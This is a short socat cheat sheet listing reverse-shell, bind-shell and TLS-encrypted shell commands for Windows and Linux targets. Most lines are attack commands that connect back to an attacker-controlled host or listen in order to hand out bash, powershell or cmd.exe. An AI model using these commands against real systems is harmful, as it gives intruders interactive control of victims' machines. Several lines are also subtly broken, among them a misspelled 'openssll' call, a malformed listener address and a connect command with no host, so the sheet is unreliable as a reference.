# socat cheat sheet

## Reverse Shell

### reverse shell listener

```sh
socat tcp-l:<port> -
```

```sh
socat TCP-L:<PORT> file:`tty`,raw,echo=0
```

### windows target

```sh
socat TCP:<LOCAL-IP>:<LOCAL-PORT> EXEC:powershell.exe,pipes
```

### linux target

```sh
socat TCP:<LOCAL-IP>:<LOCAL-PORT> EXEC:"bash -li",pty,stderr,sigint,setsid,sane
```

## Bind Shell

### generic connect

```sh
socat TCP:<TARGET-IP>:<TARGET-PORT> -
```

### windows target listener

```sh
socat TCP-L:<PORT> EXEC:powershell.exe,pipes
```

### linux target listener

```sh
socat TCP-L:<PORT> EXEC:"bash -li"
```

## Connect from statically compiled socat to LHOST

Binary is inside this dir
```sh
socat TCP:<ATTACKER-IP>:<ATTACKER-PORT> EXEC:"bash -li",pty,stderr,sigint,setsid,sane
```

## Encrypted Shell

### create key + cert

```sh
openssll req --newkey rsa:2048 -nodes -keyout shell.key -x509 -days 365 -out shell.crt
```

### create pem file

```sh
cat shell.key shell.crt > shell.pem
```

### reverse shell listener

```sh
socat openssl-listen:<port>,cert=shell.pem,verify=0 -
```

```sh
socat openssl-listen:<port>,cert=shell.pem,verify=0 file:`tty`,raw,echo=0
```

### connecting shell on target to listener

```sh
socat openssl:<attacker-ip>:<attacker-port>,verify=0 exec:/bin/bash
```

```sh
socat openssl:<attacker-ip>:<attacker-port>,verify=0 exec:"bash -li",pty,stderr,sigint,setsid,sane
```

### encrypted bind shell on windows listening

Target:

```sh
socat openssl-listen:<local-ip>:<local-port>,verify=0 exec:cmd.exe,pipes
```

### encrypted bind shell attacker connecting

```sh
socat openssl:<port>,cert=shell.pem,verify=0 -
```